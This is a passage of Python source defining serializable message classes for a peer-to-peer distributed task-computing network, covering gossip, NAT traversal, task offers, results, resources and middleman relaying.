        """Return the dictionary payload of this message."""
        return {MessageDegree.DEGREE_STR: self.degree}
class MessageGossip(Message):
    """Carries gossip to be spread through the network."""
    Type = P2P_MESSAGE_BASE + 11
    GOSSIP_STR = u"GOSSIP"

    def __init__(self, gossip=None, sig="", timestamp=None, dict_repr=None):
        """Create a gossip message.

        :param list gossip: gossip to be sent
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageGossip.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword argument.
        self.gossip = dict_repr[MessageGossip.GOSSIP_STR] if dict_repr else gossip

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessageGossip.GOSSIP_STR: self.gossip}
class MessageStopGossip(Message):
    """Signals that gossiping should stop."""
    Type = P2P_MESSAGE_BASE + 12
    STOP_GOSSIP_STR = u"STOP_GOSSIP"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Create a stop-gossip message.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageStopGossip.Type, sig, timestamp)
        if dict_repr:
            # A deserialized message must carry its truthy marker flag.
            assert dict_repr.get(MessageStopGossip.STOP_GOSSIP_STR)

    def dict_repr(self):
        """Return the marker-flag payload."""
        return {MessageStopGossip.STOP_GOSSIP_STR: True}
class MessageLocRank(Message):
    """Carries a local opinion (rank) about a given node."""
    Type = P2P_MESSAGE_BASE + 13
    NODE_ID_STR = u"NODE_ID"
    LOC_RANK_STR = u"LOC_RANK"

    def __init__(self, node_id='', loc_rank='', sig="", timestamp=None, dict_repr=None):
        """Create a message with a local opinion about the given node.

        :param uuid node_id: the opinion concerns the node with this id
        :param LocalRank loc_rank: opinion about the node
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageLocRank.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword arguments.
        self.node_id = dict_repr[MessageLocRank.NODE_ID_STR] if dict_repr else node_id
        self.loc_rank = dict_repr[MessageLocRank.LOC_RANK_STR] if dict_repr else loc_rank

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessageLocRank.NODE_ID_STR: self.node_id,
                MessageLocRank.LOC_RANK_STR: self.loc_rank}
class MessageFindNode(Message):
    """Request to locate a node by its public key."""
    Type = P2P_MESSAGE_BASE + 14
    NODE_KEY_ID_STR = u"NODE_KEY_ID"

    def __init__(self, node_key_id='', sig="", timestamp=None, dict_repr=None):
        """Create a find-node message.

        :param str node_key_id: key of the node to be found
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageFindNode.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword argument.
        self.node_key_id = dict_repr[MessageFindNode.NODE_KEY_ID_STR] if dict_repr else node_key_id

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessageFindNode.NODE_KEY_ID_STR: self.node_key_id}
class MessageWantToStartTaskSession(Message):
    """Request to start a task session with a given node."""
    Type = P2P_MESSAGE_BASE + 15
    NODE_INFO_STR = u"NODE_INFO"
    CONN_ID_STR = u"CONN_ID"
    SUPER_NODE_INFO_STR = u"SUPER_NODE_INFO"

    def __init__(self, node_info=None, conn_id=None, super_node_info=None, sig="", timestamp=None,
                 dict_repr=None):
        """Create a request for starting a task session with the given node.

        :param Node node_info: information about this node
        :param uuid conn_id: connection id for reference
        :param Node|None super_node_info: information about a known supernode
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageWantToStartTaskSession.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword arguments.
        self.node_info = dict_repr[MessageWantToStartTaskSession.NODE_INFO_STR] if dict_repr else node_info
        self.conn_id = dict_repr[MessageWantToStartTaskSession.CONN_ID_STR] if dict_repr else conn_id
        self.super_node_info = dict_repr[MessageWantToStartTaskSession.SUPER_NODE_INFO_STR] if dict_repr \
            else super_node_info

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {
            MessageWantToStartTaskSession.NODE_INFO_STR: self.node_info,
            MessageWantToStartTaskSession.CONN_ID_STR: self.conn_id,
            MessageWantToStartTaskSession.SUPER_NODE_INFO_STR: self.super_node_info
        }
class MessageSetTaskSession(Message):
    """Relays that the node in node_info wants a task session with key_id."""
    Type = P2P_MESSAGE_BASE + 16
    KEY_ID_STR = u"KEY_ID"
    NODE_INFO_STR = u"NODE_INFO"
    CONN_ID_STR = u"CONN_ID"
    SUPER_NODE_INFO_STR = u"SUPER_NODE_INFO"

    def __init__(self, key_id=None, node_info=None, conn_id=None, super_node_info=None, sig="", timestamp=None,
                 dict_repr=None):
        """Create the relayed task-session request.

        :param key_id: target node key
        :param Node node_info: information about the requestor
        :param uuid conn_id: connection id for reference
        :param Node|None super_node_info: information about a known supernode
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageSetTaskSession.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword arguments.
        self.key_id = dict_repr[MessageSetTaskSession.KEY_ID_STR] if dict_repr else key_id
        self.node_info = dict_repr[MessageSetTaskSession.NODE_INFO_STR] if dict_repr else node_info
        self.conn_id = dict_repr[MessageSetTaskSession.CONN_ID_STR] if dict_repr else conn_id
        self.super_node_info = dict_repr[MessageSetTaskSession.SUPER_NODE_INFO_STR] if dict_repr \
            else super_node_info

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {
            MessageSetTaskSession.KEY_ID_STR: self.key_id,
            MessageSetTaskSession.NODE_INFO_STR: self.node_info,
            MessageSetTaskSession.CONN_ID_STR: self.conn_id,
            MessageSetTaskSession.SUPER_NODE_INFO_STR: self.super_node_info
        }
class MessageNatHole(Message):
    """Describes a punched NAT hole (node key, address, port)."""
    Type = P2P_MESSAGE_BASE + 17
    KEY_ID_STR = u"KEY_ID"
    ADDR_STR = u"ADDR"
    PORT_STR = u"PORT"
    CONN_ID_STR = u"CONN_ID"

    def __init__(self, key_id=None, addr=None, port=None, conn_id=None, sig="", timestamp=None,
                 dict_repr=None):
        """Create a message with information about a nat hole.

        :param key_id: key of the node behind the nat hole
        :param str addr: address of the nat hole
        :param int port: port of the nat hole
        :param uuid conn_id: connection id for reference
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageNatHole.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword arguments.
        self.key_id = dict_repr[MessageNatHole.KEY_ID_STR] if dict_repr else key_id
        self.addr = dict_repr[MessageNatHole.ADDR_STR] if dict_repr else addr
        self.port = dict_repr[MessageNatHole.PORT_STR] if dict_repr else port
        self.conn_id = dict_repr[MessageNatHole.CONN_ID_STR] if dict_repr else conn_id

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {
            MessageNatHole.KEY_ID_STR: self.key_id,
            MessageNatHole.ADDR_STR: self.addr,
            MessageNatHole.PORT_STR: self.port,
            MessageNatHole.CONN_ID_STR: self.conn_id
        }
class MessageNatTraverseFailure(Message):
    """Reports an unsuccessful NAT traversal attempt."""
    Type = P2P_MESSAGE_BASE + 18
    CONN_ID_STR = u"CONN_ID"

    def __init__(self, conn_id=None, sig="", timestamp=None, dict_repr=None):
        """Create a nat-traverse-failure message.

        :param uuid conn_id: connection id for reference
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageNatTraverseFailure.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword argument.
        self.conn_id = dict_repr[MessageNatTraverseFailure.CONN_ID_STR] if dict_repr else conn_id

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {
            MessageNatTraverseFailure.CONN_ID_STR: self.conn_id
        }
class MessageInformAboutNatTraverseFailure(Message):
    """Asks a relay to inform node key_id about a failed NAT traversal."""
    Type = P2P_MESSAGE_BASE + 19
    KEY_ID_STR = u"KEY_ID"
    CONN_ID_STR = u"CONN_ID"

    def __init__(self, key_id=None, conn_id=None, sig="", timestamp=None, dict_repr=None):
        """Create the inform-about-failure request.

        :param key_id: key of the node that should be informed about the failure
        :param uuid conn_id: connection id for reference
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageInformAboutNatTraverseFailure.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword arguments.
        self.key_id = dict_repr[MessageInformAboutNatTraverseFailure.KEY_ID_STR] if dict_repr else key_id
        self.conn_id = dict_repr[MessageInformAboutNatTraverseFailure.CONN_ID_STR] if dict_repr else conn_id

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {
            MessageInformAboutNatTraverseFailure.KEY_ID_STR: self.key_id,
            MessageInformAboutNatTraverseFailure.CONN_ID_STR: self.conn_id
        }
TASK_MSG_BASE = 2000
class MessageWantToComputeTask(Message):
    """Offer from a node to compute a given task."""
    Type = TASK_MSG_BASE + 1
    NODE_NAME_STR = u"NODE_NAME"
    TASK_ID_STR = u"TASK_ID"
    PERF_INDEX_STR = u"PERF_INDEX"
    MAX_RES_STR = u"MAX_RES"
    MAX_MEM_STR = u"MAX_MEM"
    NUM_CORES_STR = u"NUM_CORES"
    PRICE_STR = u"PRICE"

    def __init__(self, node_name=0, task_id=0, perf_index=0, price=0, max_resource_size=0, max_memory_size=0,
                 num_cores=0, sig="", timestamp=None, dict_repr=None):
        """Create a message offering to compute the given task.

        :param str node_name: id of the offering node
        :param uuid task_id: id of the task that the node wants to compute
        :param float perf_index: benchmark result for this task type
        :param price: offered price
        :param int max_resource_size: how much disk space this node can offer
        :param int max_memory_size: how much ram this node can offer
        :param int num_cores: how many cpu cores this node can offer
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageWantToComputeTask.Type, sig, timestamp)
        if dict_repr:
            # Restore every field from the serialized form.
            self.node_name = dict_repr[MessageWantToComputeTask.NODE_NAME_STR]
            self.task_id = dict_repr[MessageWantToComputeTask.TASK_ID_STR]
            self.perf_index = dict_repr[MessageWantToComputeTask.PERF_INDEX_STR]
            self.max_resource_size = dict_repr[MessageWantToComputeTask.MAX_RES_STR]
            self.max_memory_size = dict_repr[MessageWantToComputeTask.MAX_MEM_STR]
            self.num_cores = dict_repr[MessageWantToComputeTask.NUM_CORES_STR]
            self.price = dict_repr[MessageWantToComputeTask.PRICE_STR]
        else:
            self.node_name = node_name
            self.task_id = task_id
            self.perf_index = perf_index
            self.max_resource_size = max_resource_size
            self.max_memory_size = max_memory_size
            self.num_cores = num_cores
            self.price = price

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessageWantToComputeTask.NODE_NAME_STR: self.node_name,
                MessageWantToComputeTask.TASK_ID_STR: self.task_id,
                MessageWantToComputeTask.PERF_INDEX_STR: self.perf_index,
                MessageWantToComputeTask.MAX_RES_STR: self.max_resource_size,
                MessageWantToComputeTask.MAX_MEM_STR: self.max_memory_size,
                MessageWantToComputeTask.NUM_CORES_STR: self.num_cores,
                MessageWantToComputeTask.PRICE_STR: self.price}
class MessageTaskToCompute(Message):
    """Carries the definition of a subtask to be computed."""
    Type = TASK_MSG_BASE + 2
    COMPUTE_TASK_DEF_STR = u"COMPUTE_TASK_DEF"

    def __init__(self, ctd=None, sig="", timestamp=None, dict_repr=None):
        """Create a message with information about a subtask to compute.

        :param ComputeTaskDef ctd: definition of the subtask that should be computed
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageTaskToCompute.Type, sig, timestamp)
        # A provided dict_repr takes precedence over the keyword argument.
        self.ctd = dict_repr[MessageTaskToCompute.COMPUTE_TASK_DEF_STR] if dict_repr else ctd

    def dict_repr(self):
        """Return the dictionary payload of this message."""
        return {MessageTaskToCompute.COMPUTE_TASK_DEF_STR: self.ctd}

    def get_short_hash(self):
        """Hash only the (recursively sorted) compute-task definition."""
        return SimpleHash.hash(SimpleSerializer.dumps(self._sort_obj(self.ctd)))
class MessageCannotAssignTask(Message):
    Type = TASK_MSG_BASE + 3
    REASON_STR = u"REASON"
    TASK_ID_STR = u"TASK_ID"

    def __init__(self, task_id=0, reason="", sig="", timestamp=None, dict_repr=None):
        """Tell the asking node that it will not get the task to compute.

        :param task_id: id of the task that cannot be assigned
        :param str reason: why the task cannot be assigned to the asking node
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageCannotAssignTask.Type, sig, timestamp)
        if dict_repr:
            task_id = dict_repr[MessageCannotAssignTask.TASK_ID_STR]
            reason = dict_repr[MessageCannotAssignTask.REASON_STR]
        self.task_id = task_id
        self.reason = reason

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageCannotAssignTask.TASK_ID_STR: self.task_id,
                MessageCannotAssignTask.REASON_STR: self.reason}
class MessageReportComputedTask(Message):
    # FIXME this message should be simpler
    Type = TASK_MSG_BASE + 4
    SUB_TASK_ID_STR = u"SUB_TASK_ID"
    RESULT_TYPE_STR = u"RESULT_TYPE"
    COMPUTATION_TIME_STR = u"COMPUTATION_TIME"
    NODE_NAME_STR = u"NODE_NAME"
    ADDR_STR = u"ADDR"
    NODE_INFO_STR = u"NODE_INFO"
    PORT_STR = u"PORT"
    KEY_ID_STR = u"KEY_ID"
    EXTRA_DATA_STR = u"EXTRA_DATA"
    ETH_ACCOUNT_STR = u"ETH_ACCOUNT"

    def __init__(self, subtask_id=0, result_type=None, computation_time='', node_name='', address='',
                 port='', key_id='', node_info=None, eth_account='', extra_data=None,
                 sig="", timestamp=None, dict_repr=None):
        """Report that a subtask computation has finished.

        :param str subtask_id: id of the finished subtask
        :param int result_type: type of the result (from result_types dict)
        :param float computation_time: how long the subtask took to compute
        :param node_name: task result owner name
        :param str address: task result owner address
        :param int port: task result owner port
        :param key_id: task result owner key
        :param Node node_info: information about this node
        :param str eth_account: ethereum address (bytes20) of task result owner
        :param extra_data: additional information, e.g. a list of files
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageReportComputedTask.Type, sig, timestamp)
        m = MessageReportComputedTask
        self.subtask_id = subtask_id
        self.result_type = result_type
        self.computation_time = computation_time
        self.node_name = node_name
        self.address = address
        self.port = port
        self.key_id = key_id
        self.node_info = node_info
        self.eth_account = eth_account
        self.extra_data = extra_data
        # A provided dict_repr overrides every keyword argument above.
        if dict_repr:
            self.subtask_id = dict_repr[m.SUB_TASK_ID_STR]
            self.result_type = dict_repr[m.RESULT_TYPE_STR]
            self.computation_time = dict_repr[m.COMPUTATION_TIME_STR]
            self.node_name = dict_repr[m.NODE_NAME_STR]
            self.address = dict_repr[m.ADDR_STR]
            self.port = dict_repr[m.PORT_STR]
            self.key_id = dict_repr[m.KEY_ID_STR]
            self.eth_account = dict_repr[m.ETH_ACCOUNT_STR]
            self.extra_data = dict_repr[m.EXTRA_DATA_STR]
            self.node_info = dict_repr[m.NODE_INFO_STR]

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        m = MessageReportComputedTask
        return {m.SUB_TASK_ID_STR: self.subtask_id,
                m.RESULT_TYPE_STR: self.result_type,
                m.COMPUTATION_TIME_STR: self.computation_time,
                m.NODE_NAME_STR: self.node_name,
                m.ADDR_STR: self.address,
                m.PORT_STR: self.port,
                m.KEY_ID_STR: self.key_id,
                m.ETH_ACCOUNT_STR: self.eth_account,
                m.EXTRA_DATA_STR: self.extra_data,
                m.NODE_INFO_STR: self.node_info}
class MessageGetTaskResult(Message):
    Type = TASK_MSG_BASE + 5
    SUB_TASK_ID_STR = u"SUB_TASK_ID"
    DELAY_STR = u"DELAY"

    def __init__(self, subtask_id="", delay=0.0, sig="", timestamp=None, dict_repr=None):
        """Request the result of a finished subtask.

        :param str subtask_id: finished subtask id
        :param float delay: 0 means the result should be sent right now;
            otherwise the other node should wait <delay> seconds before
            sending the result
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageGetTaskResult.Type, sig, timestamp)
        if dict_repr:
            subtask_id = dict_repr[MessageGetTaskResult.SUB_TASK_ID_STR]
            delay = dict_repr[MessageGetTaskResult.DELAY_STR]
        self.subtask_id = subtask_id
        self.delay = delay

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageGetTaskResult.SUB_TASK_ID_STR: self.subtask_id,
                MessageGetTaskResult.DELAY_STR: self.delay}
# It's an old form of sending task result (don't use if it isn't necessary)
class MessageTaskResult(Message):
    Type = TASK_MSG_BASE + 6
    SUB_TASK_ID_STR = u"SUB_TASK_ID"
    RESULT_STR = u"RESULT"

    def __init__(self, subtask_id=0, result=None, sig="", timestamp=None, dict_repr=None):
        """Carry a computed task result in-band (legacy transport).

        :param str subtask_id: id of the finished subtask
        :param result: task result in binary form
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageTaskResult.Type, sig, timestamp)
        if dict_repr:
            subtask_id = dict_repr[MessageTaskResult.SUB_TASK_ID_STR]
            result = dict_repr[MessageTaskResult.RESULT_STR]
        self.subtask_id = subtask_id
        self.result = result

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageTaskResult.SUB_TASK_ID_STR: self.subtask_id,
                MessageTaskResult.RESULT_STR: self.result}
class MessageTaskResultHash(Message):
    Type = TASK_MSG_BASE + 7
    SUB_TASK_ID_STR = u"SUB_TASK_ID"
    MULTIHASH_STR = u"MULTIHASH"
    SECRET_STR = u"SECRET"
    OPTIONS_STR = u"OPTIONS"

    def __init__(self, subtask_id=0, multihash="", secret="", options=None, sig="", timestamp=None, dict_repr=None):
        """Announce a subtask result by hash rather than sending it in-band.

        :param subtask_id: id of the finished subtask
        :param str multihash: hash identifying the result
            (presumably in the resource network -- TODO confirm against callers)
        :param str secret: secret needed to retrieve/decode the result -- TODO confirm
        :param options: transport options object
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageTaskResultHash.Type, sig, timestamp)
        m = MessageTaskResultHash
        if dict_repr:
            subtask_id = dict_repr[m.SUB_TASK_ID_STR]
            multihash = dict_repr[m.MULTIHASH_STR]
            secret = dict_repr[m.SECRET_STR]
            options = dict_repr[m.OPTIONS_STR]
        self.subtask_id = subtask_id
        self.multihash = multihash
        self.secret = secret
        self.options = options

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        m = MessageTaskResultHash
        return {m.SUB_TASK_ID_STR: self.subtask_id,
                m.MULTIHASH_STR: self.multihash,
                m.SECRET_STR: self.secret,
                m.OPTIONS_STR: self.options}
class MessageGetResource(Message):
    Type = TASK_MSG_BASE + 8
    # NOTE(review): the wire key is u"SUB_TASK_ID" although the attribute holds
    # a task id; kept byte-identical for wire compatibility -- confirm before renaming.
    TASK_ID_STR = u"SUB_TASK_ID"
    RESOURCE_HEADER_STR = u"RESOURCE_HEADER"

    def __init__(self, task_id="", resource_header=None, sig="", timestamp=None, dict_repr=None):
        """Request the resources of a given task.

        :param uuid task_id: id of the task whose resources are requested
        :param ResourceHeader resource_header: description of resources that this node already has
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageGetResource.Type, sig, timestamp)
        if dict_repr:
            task_id = dict_repr[MessageGetResource.TASK_ID_STR]
            resource_header = dict_repr[MessageGetResource.RESOURCE_HEADER_STR]
        self.task_id = task_id
        self.resource_header = resource_header

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageGetResource.TASK_ID_STR: self.task_id,
                MessageGetResource.RESOURCE_HEADER_STR: self.resource_header}
# Old method of sending resource. Don't use if it isn't necessary.
class MessageResource(Message):
    Type = TASK_MSG_BASE + 9
    SUB_TASK_ID_STR = u"SUB_TASK_ID"
    RESOURCE_STR = u"RESOURCE"

    def __init__(self, subtask_id=0, resource=None, sig="", timestamp=None, dict_repr=None):
        """Carry a resource in-band (legacy transport).

        :param str subtask_id: the attached resource is needed to compute this subtask
        :param resource: resource in binary form
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageResource.Type, sig, timestamp)
        if dict_repr:
            subtask_id = dict_repr[MessageResource.SUB_TASK_ID_STR]
            resource = dict_repr[MessageResource.RESOURCE_STR]
        self.subtask_id = subtask_id
        self.resource = resource

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageResource.SUB_TASK_ID_STR: self.subtask_id,
                MessageResource.RESOURCE_STR: self.resource}
class MessageSubtaskResultAccepted(Message):
    Type = TASK_MSG_BASE + 10
    SUB_TASK_ID_STR = u"SUB_TASK_ID"
    # NOTE(review): NODE_ID_STR is not used by the current (de)serialization.
    NODE_ID_STR = u"NODE_ID"
    REWARD_STR = u"REWARD"

    def __init__(self, subtask_id=0, reward=0, sig="", timestamp=None, dict_repr=None):
        """Confirm that a subtask result has been accepted.

        :param str subtask_id: id of the accepted subtask
        :param float reward: payment for the computation
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageSubtaskResultAccepted.Type, sig, timestamp)
        if dict_repr:
            subtask_id = dict_repr[MessageSubtaskResultAccepted.SUB_TASK_ID_STR]
            reward = dict_repr[MessageSubtaskResultAccepted.REWARD_STR]
        self.subtask_id = subtask_id
        self.reward = reward

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageSubtaskResultAccepted.SUB_TASK_ID_STR: self.subtask_id,
                MessageSubtaskResultAccepted.REWARD_STR: self.reward}
class MessageSubtaskResultRejected(Message):
    Type = TASK_MSG_BASE + 11
    SUB_TASK_ID_STR = u"SUB_TASK_ID"

    def __init__(self, subtask_id=0, sig="", timestamp=None, dict_repr=None):
        """Inform the other node that a subtask result was rejected.

        :param str subtask_id: id of the rejected subtask
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageSubtaskResultRejected.Type, sig, timestamp)
        if dict_repr:
            subtask_id = dict_repr[MessageSubtaskResultRejected.SUB_TASK_ID_STR]
        self.subtask_id = subtask_id

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageSubtaskResultRejected.SUB_TASK_ID_STR: self.subtask_id}
class MessageDeltaParts(Message):
    Type = TASK_MSG_BASE + 12
    TASK_ID_STR = u"TASK_ID"
    DELTA_HEADER_STR = u"DELTA_HEADER"
    PARTS_STR = u"PARTS"
    NODE_NAME_STR = u"NODE_NAME"
    ADDR_STR = u"ADDR"
    PORT_STR = u"PORT"
    # NOTE(review): lowercase wire key is inconsistent with the rest of this
    # message but must stay byte-identical for wire compatibility.
    NODE_INFO_STR = u"node info"

    def __init__(self, task_id=0, delta_header=None, parts=None, node_name='',
                 node_info=None, addr='', port='', sig="", timestamp=None,
                 dict_repr=None):
        """Describe task resources as "delta parts".

        :param task_id: resources belong to the task with this id
        :param TaskResourceHeader delta_header: resource header containing only
            the parts the computing node does not have yet
        :param list parts: all files needed to create the resources
        :param str node_name: resource owner name
        :param Node node_info: information about the resource owner
        :param addr: resource owner address
        :param port: resource owner port
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageDeltaParts.Type, sig, timestamp)
        m = MessageDeltaParts
        if dict_repr:
            task_id = dict_repr[m.TASK_ID_STR]
            delta_header = dict_repr[m.DELTA_HEADER_STR]
            parts = dict_repr[m.PARTS_STR]
            node_name = dict_repr[m.NODE_NAME_STR]
            addr = dict_repr[m.ADDR_STR]
            port = dict_repr[m.PORT_STR]
            node_info = dict_repr[m.NODE_INFO_STR]
        self.task_id = task_id
        self.delta_header = delta_header
        self.parts = parts
        self.node_name = node_name
        self.addr = addr
        self.port = port
        self.node_info = node_info

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        m = MessageDeltaParts
        return {m.TASK_ID_STR: self.task_id,
                m.DELTA_HEADER_STR: self.delta_header,
                m.PARTS_STR: self.parts,
                m.NODE_NAME_STR: self.node_name,
                m.ADDR_STR: self.addr,
                m.PORT_STR: self.port,
                m.NODE_INFO_STR: self.node_info}
class MessageResourceFormat(Message):
    Type = TASK_MSG_BASE + 13
    USE_DISTRIBUTED_RESOURCE_STR = u"USE_DISTRIBUTED_RESOURCE"

    def __init__(self, use_distributed_resource=0, sig="", timestamp=None, dict_repr=None):
        """Describe how the resource will be delivered.

        :param bool use_distributed_resource: False if the resource will be sent
            directly; True if it should be pulled from the network via the
            resource server
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageResourceFormat.Type, sig, timestamp)
        if dict_repr:
            use_distributed_resource = dict_repr[MessageResourceFormat.USE_DISTRIBUTED_RESOURCE_STR]
        self.use_distributed_resource = use_distributed_resource

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageResourceFormat.USE_DISTRIBUTED_RESOURCE_STR: self.use_distributed_resource}
class MessageAcceptResourceFormat(Message):
    Type = TASK_MSG_BASE + 14
    ACCEPT_RESOURCE_FORMAT_STR = u"ACCEPT_RESOURCE_FORMAT"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Confirm the proposed resource format.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageAcceptResourceFormat.Type, sig, timestamp)
        if dict_repr:
            # The serialized form carries only a truthy marker flag.
            assert dict_repr.get(MessageAcceptResourceFormat.ACCEPT_RESOURCE_FORMAT_STR)

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageAcceptResourceFormat.ACCEPT_RESOURCE_FORMAT_STR: True}
class MessageTaskFailure(Message):
    Type = TASK_MSG_BASE + 15
    SUBTASK_ID_STR = u"SUBTASK_ID"
    ERR_STR = u"ERR"

    def __init__(self, subtask_id="", err="", sig="", timestamp=None, dict_repr=None):
        """Report that a subtask computation failed.

        :param str subtask_id: id of the failed subtask
        :param str err: error message produced during the computation
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageTaskFailure.Type, sig, timestamp)
        if dict_repr:
            subtask_id = dict_repr[MessageTaskFailure.SUBTASK_ID_STR]
            err = dict_repr[MessageTaskFailure.ERR_STR]
        self.subtask_id = subtask_id
        self.err = err

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageTaskFailure.SUBTASK_ID_STR: self.subtask_id,
                MessageTaskFailure.ERR_STR: self.err}
class MessageStartSessionResponse(Message):
    Type = TASK_MSG_BASE + 16
    CONN_ID_STR = u"CONN_ID"

    def __init__(self, conn_id=None, sig="", timestamp=None, dict_repr=None):
        """Announce that this session was started in answer to a start-task-session request.

        :param uuid conn_id: connection id for reference
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageStartSessionResponse.Type, sig, timestamp)
        if dict_repr:
            conn_id = dict_repr[MessageStartSessionResponse.CONN_ID_STR]
        self.conn_id = conn_id

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageStartSessionResponse.CONN_ID_STR: self.conn_id}
class MessageMiddleman(Message):
    Type = TASK_MSG_BASE + 17
    ASKING_NODE_STR = u"ASKING_NODE"
    DEST_NODE_STR = u"DEST_NODE"
    ASK_CONN_ID_STR = u"ASK_CONN_ID"

    def __init__(self, asking_node=None, dest_node=None, ask_conn_id=None, sig="", timestamp=None,
                 dict_repr=None):
        """Ask a node to become a middleman in the communication with another node.

        :param Node asking_node: the other node; the middleman should connect with it
        :param Node dest_node: information about this node
        :param ask_conn_id: connection id the asking node gave for reference
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageMiddleman.Type, sig, timestamp)
        m = MessageMiddleman
        if dict_repr:
            asking_node = dict_repr[m.ASKING_NODE_STR]
            dest_node = dict_repr[m.DEST_NODE_STR]
            ask_conn_id = dict_repr[m.ASK_CONN_ID_STR]
        self.asking_node = asking_node
        self.dest_node = dest_node
        self.ask_conn_id = ask_conn_id

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        m = MessageMiddleman
        return {m.ASKING_NODE_STR: self.asking_node,
                m.DEST_NODE_STR: self.dest_node,
                m.ASK_CONN_ID_STR: self.ask_conn_id}
class MessageJoinMiddlemanConn(Message):
    Type = TASK_MSG_BASE + 18
    CONN_ID_STR = u"CONN_ID"
    KEY_ID_STR = u"KEY_ID"
    DEST_NODE_KEY_ID_STR = u"DEST_NODE_KEY_ID"

    def __init__(self, key_id=None, conn_id=None, dest_node_key_id=None, sig="", timestamp=None, dict_repr=None):
        """Ask a node to communicate with another node through a middleman connection.

        This node is the middleman; the connection with the other node is
        already opened.

        :param key_id: this node's public key
        :param conn_id: connection id for reference
        :param dest_node_key_id: public key of the other end of the middleman connection
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageJoinMiddlemanConn.Type, sig, timestamp)
        m = MessageJoinMiddlemanConn
        if dict_repr:
            conn_id = dict_repr[m.CONN_ID_STR]
            key_id = dict_repr[m.KEY_ID_STR]
